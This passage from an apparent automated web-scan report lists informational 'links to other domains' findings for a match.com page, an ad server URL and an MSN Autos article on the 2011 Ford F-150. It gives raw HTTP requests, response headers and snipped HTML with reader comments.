ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=VV6atycnKtVj%2f0DUpoRqMA%3d%3d&Handle=missannabella10&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/28/25/98452825A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=O3jZyTlHhw3nqW3capqvuw%3d%3d&Handle=LivinMyAdventure&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/89/08/96658908A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=S6v5LNyVojgGO4n9DBYF9A%3d%3d&Handle=smilebrendasucce&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/79/51/96637951A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=H7Vrj1WCxfcwDlfT0j2%2fIA%3d%3d&Handle=MzSincere22&lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/11/08/94411108A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

22.71. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1860849269@x23

Issue detail

The page was loaded from a URL containing a query string:

http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728

The response contains the following link to another domain:

http://ib.adnxs.com/seg?add=81825&t=2

Request

Response

22.72. http://editorial.autos.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://editorial.autos.redacted/article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017

The response contains the following links to other domains:

http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://cid-aac36e1645e7b117.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-bfdd1d012ec983ba.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-ddc24ec5a662d8e6.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalauto.112.2o7.net/b/ss/msnportalauto/1/H.1--NS/0
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/images/search?q=2011+Ford+F-150&qpvt=2011+Ford+F-150&FORM=A0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=A0
http://www.bing.com/search?q=Ford+2010+profit+highest&form=MSNS06
http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&form=MSNS06
http://www.bing.com/search?q=GM+green+loan&form=MSNS06
http://www.bing.com/search?q=best+engine&src=IE-SearchBox&FORM=A0
http://www.bing.com/search?q=fuel+economy&src=IE-SearchBox&FORM=A0
http://www.bing.com/search?q=south+korea+kia+net+profit&form=MSNS06
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344768&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Feditorial.autos.msn.com%2Farticle.aspx%3Fcp-documentid%3D1167044%26icid%3Dautos_0252%26GT1%3D22017&lc=1033&id=72801
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017 HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b2ef7ad8883e47ad8f65e6301704c832; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=367C6313EA264C81A9D2BCFF5336B69D; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 92416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A0">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344768&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Feditorial.autos.msn.com%2Farticle.aspx%3Fcp-documentid%3D1167044%26icid%3Dautos_0252%26GT1%3D22017&lc=1033&id=72801" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Ford+2010+profit+highest&form=MSNS06">ford highest profit</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+green+loan&form=MSNS06">GM 'green' loan</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&form=MSNS06">volt sales</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=south+korea+kia+net+profit&form=MSNS06">kia motors hits record</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<p>What would you say if we told you the <a href="http://www.bing.com/search?q=best+engine&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;">best engine</a>
...[SNIP]...
</a> is revamping the F-150's entire engine lineup for 2011, adding, among others, a twin-turbocharged 3.5-liter EcoBoost V6. It bests the two available V8s for <a href="http://www.bing.com/search?q=fuel+economy&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;">fuel economy</a>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=2011+Ford+F-150&qpvt=2011+Ford+F-150&FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyiDak0zPyY8ZrhokyR9iNRRhd1GC66Nd?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-ddc24ec5a662d8e6.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Clint Crawford
..(GrayWolf1946)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-ddc24ec5a662d8e6.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAdPV_rwmgnp98hdC1XRlJrzIAq49WyXf?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAdPV_rwmgnp98hdC1XRlJrzIAq49WyXf?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyiDak0zPyY8ZrhokyR9iNRRhd1GC66Nd?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-26Ie0m2cta3FE_xU06GFh0E9RViXzB0?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-bfdd1d012ec983ba.profile.live.com/msn/posts?mkt=en-US&domain=en-US">scott
..(sg455parts)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-bfdd1d012ec983ba.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrgRkjgnLOw0ZYfTyEirpPmnkXYWmoIl-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XgSkN-d-sZqV75UtUQscq2BVmyTobSPrz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XgEfIOLeyjEgLRqgrRf7RWktCKeayYalf?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyEaFNhDro1L95eJJ2hH_mmQglTGGluZW?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGl3H5Klglx76IvNFpR88GO8xYhCSxjpt?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XnQHep8tHn2f33Vnxdc3hdCb-gr_uhB-z?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPZrpIw_sk8OSJiv6rRLBq-ViZNF08yCu?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Brad Hardy
..(american strong)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPZrpIw_sk8OSJiv6rRLBq-ViZNF08yCu?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJA97mi-6p5wbgCfgpZtVRPa7DzMQhw85?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xa7QDPa0ksIKMMlm6QxG3DraExnprjte_?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-aac36e1645e7b117.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Mickey Streater
..(Not the Liar)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-aac36e1645e7b117.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Brad Hardy
..(american strong)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
</div>..<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalauto.112.2O7.net/b/ss/msnportalauto/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.73. http://editorial.autos.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://editorial.autos.redacted/article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017

The response contains the following links to other domains:

http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://cid-072dc8c7b411d87a.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-b28ec39d922a6bc1.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-b8331f3fa1194109.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/embed.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalauto.112.2o7.net/b/ss/msnportalauto/1/H.1--NS/0
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/angry_smile.gif
http://us.social.s-msn.com/s/images/emoticons/dog.gif
http://us.social.s-msn.com/s/images/emoticons/regular_smile.gif
http://www.bing.com/images/search?q=2011+Ford+F-150&qpvt=2011+Ford+F-150&FORM=A0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=A0
http://www.bing.com/search?q=Ford+2010+profit+highest&form=MSNS06
http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&form=MSNS06
http://www.bing.com/search?q=GM+green+loan&form=MSNS06
http://www.bing.com/search?q=best+engine&src=IE-SearchBox&FORM=A0
http://www.bing.com/search?q=fuel+economy&src=IE-SearchBox&FORM=A0
http://www.bing.com/search?q=south+korea+kia+net+profit&form=MSNS06
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406037&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Feditorial.autos.msn.com%2Farticle.aspx%3Fcp-documentid%3D1167044%26icid%3Dautos_0252%26GT1%3D22017&lc=1033&id=72801
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:47:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8d404cd3ef544a8a9e3f85bf2e438f48; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B0B157AC2BEC42F3878BD3D8F218E401; domain=.autos.redacted; expires=Thu, 18-Aug-2011 16:47:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 89785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A0">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406037&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Feditorial.autos.msn.com%2Farticle.aspx%3Fcp-documentid%3D1167044%26icid%3Dautos_0252%26GT1%3D22017&lc=1033&id=72801" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Ford+2010+profit+highest&form=MSNS06">ford highest profit</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+green+loan&form=MSNS06">GM 'green' loan</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&form=MSNS06">volt sales</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=south+korea+kia+net+profit&form=MSNS06">kia motors hits record</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<p>What would you say if we told you the <a href="http://www.bing.com/search?q=best+engine&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;">best engine</a>
...[SNIP]...
</a> is revamping the F-150's entire engine lineup for 2011, adding, among others, a twin-turbocharged 3.5-liter EcoBoost V6. It bests the two available V8s for <a href="http://www.bing.com/search?q=fuel+economy&src=IE-SearchBox&FORM=A0" onclick="window.open(this.href);return false;">fuel economy</a>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=2011+Ford+F-150&qpvt=2011+Ford+F-150&FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGLz_0ZyZ6xHXDb4jvJuhua50GaZ3oJGr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XXU9UPpUbzptf9sXdGMvh6I5MpAz1e5J3?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-b28ec39d922a6bc1.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(American Made1111)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-b28ec39d922a6bc1.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xtf-DYVCnVEFgXIoKJvq2paSj3S625_Xm?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyB-HVfSz2pxlapWPdFl5byirZzY7uomp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
</span>  Why do so many of US drive the bloated gas guzzlers?<img src="http://us.social.s-redacted/s/images/emoticons/angry_smile.gif" alt="Angry" class="emoticon" />We are victims of advertising<img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" />!</p>
...[SNIP]...
<p>The world need now is love,opps,no it need a gas efficient/electric optional car NOW(quoted circa 1974!!!<img src="http://us.social.s-redacted/s/images/emoticons/dog.gif" alt="Dog face" class="emoticon" />)</p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
